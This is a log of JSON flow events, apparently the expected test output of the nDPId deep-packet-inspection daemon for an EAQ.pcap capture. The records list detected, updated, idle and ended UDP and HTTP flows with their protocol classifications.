+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820951932,"flow_last_seen":1432821016651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821016651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820952931,"flow_last_seen":1432821017651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821017651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820953931,"flow_last_seen":1432821018651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821018651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820954931,"flow_last_seen":1432821019651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821019651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820955933,"flow_last_seen":1432821020651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821020651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820956931,"flow_last_seen":1432821021652,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821021652,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957985,"flow_last_seen":1432821022695,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821022695,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959095,"flow_last_seen":1432821023795,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821023795,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821024791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821025791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821026791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821027791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821028791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821029791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821030791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821031791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821032791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821033791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821034791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821041151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820957985,"flow_last_seen":1432821044555,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820959035,"flow_last_seen":1432821045664,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820955933,"flow_last_seen":1432821042151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820952931,"flow_last_seen":1432821039151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
